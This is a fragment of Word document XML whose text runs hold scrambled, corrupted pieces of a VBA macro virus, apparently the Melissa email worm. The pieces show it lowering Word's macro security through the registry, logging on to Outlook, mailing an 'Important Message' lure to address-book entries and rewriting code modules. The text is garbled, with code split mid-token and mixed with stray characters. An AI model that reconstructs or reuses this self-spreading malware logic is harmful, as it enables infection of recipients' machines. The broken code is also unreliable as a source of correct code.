      </w:r>
    </w:p>
    <w:p w14:paraId="317DC4B9" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ent_Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0BE21" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>On E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBAD86B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>rror Res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D784F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCD36DB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>If Syste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BE4653" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Profi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599CC507" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>leS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3F8684" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ng("</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16186227" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>", "HKEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A30BC" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>_CURRENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAC697A" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>_USER\So</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357243E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ftw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31163DD5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>p\Mic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4EF004" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AA8EA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>\Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690EDC37" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ice\9.0\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A23278F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Word\Sec urity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B18346" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> Le</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205E4AF" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>vel") &lt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722AF4B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> "" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABA00C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Comman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27C7FE" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>dBars("M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40306118" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>#").Con0trol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09BF72" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>= 1&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60023734" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>,To</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500CA7F9" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>,E1N+O@ptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1094CC62" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>irm@9vers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377185AC" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>(1 - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1921E88F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>): E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E37DF5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Virubs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6663E8D5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>atec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E82280" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61804A49" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>mpt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AEBECB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*nd If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA3747" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Dim Ung</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09878E37" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>aDasOutl ook,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30678B5B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>MaDpi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F59DE74" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>, B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B7CB0E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>kDUm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5936D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>nASl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4625B768" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9DF88" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>eHObj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20013A93" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>#("</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A30EEE5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249AAB2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>.GetAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2650E6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA4020" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>{A|PI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7AEAC8" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>H by Kw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388DEEB9" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>yjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BF08C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>.Log`on "p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D17ED52" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>assw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8410C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>1 To</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E45688" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>,.Addres sList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D86BD6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>@un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EADAEB5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>3g`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781437E8" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>(y ,e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB1BD89" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>/ec8I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC10D28" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>|(0h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C228FF2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>o^o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F91DA5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>E`qi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2F78B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Peep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F569B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>(xh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A3A3E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ecipi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1956BA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>x +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39212797" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>6x &gt; t50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F895CF" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Importan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26980AC1" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>t M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E15ED0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>7age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFF1D17" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>From " &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0BD8CB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> H_.User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488AAA0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Bod!C"He</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06B5E2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>re is th</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C7F63" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>at d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792FBC19" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> yo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375001B2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>u ask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135DD1D3" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>f@H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11473C0F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Udon't s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D7CBF6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>how anyo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B88545" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ne e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD66EE" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> ;-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2A182" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>)dM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBAEB64" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>achKA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E53C23" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Full=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1540D845" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Sen6d(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B58277" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> yY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B004D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>"iDI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F274131" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>VFB RQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCEFFB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>.VB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F61B4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>[pm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3F110" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>01p*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463AEE8" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>N~T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F39C7AE" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>N8TCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE5066" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>]de</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F525E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3617969F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>OfLines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA2DA0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ADB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B52120" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>BGN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4A5D7" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Del</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131ADB16" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08539464" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0970848E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>]ToInf@\t =@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C99EA9B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>oAD0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA022D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NzT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC273FB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE832F0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>pYCYA2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF6D0FE" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Dov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC75C4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Do Wh`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFEC3B6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>oop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6D8FC" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Jc1D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF1A69" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> ("</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304DFFA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>=@#,p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D112547" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>(Inu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CFFC1E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>iv_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2707F73F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>0':B'k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A4F863" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B0)0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED9D944" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*AsA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5670BD60" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>InP!Q&amp;L[!0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DE424" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>= F!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC611DF" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>As F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A854DB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>:~=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC1BEB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>'WORD/TLD w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57CF5B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA8662" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ks iP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC263E0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>oth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E4F09" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAACAC3" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>97S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931610C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>m?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3664EAC4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>d -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F4023" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Email |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C5DE1" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>&lt;-@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCA2814" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>fit'@s a ne</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570489B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Day(No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E24C5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>wA@Min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F577D4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>W@gon.Ty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5402C6D2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>peTp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09925915" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>y-two po</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E703898" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>i g, plu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42380160" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>@riple-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799997C3" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>- scoret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14601685" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>fi(fty</w:t>
      </w:r>
    </w:p>
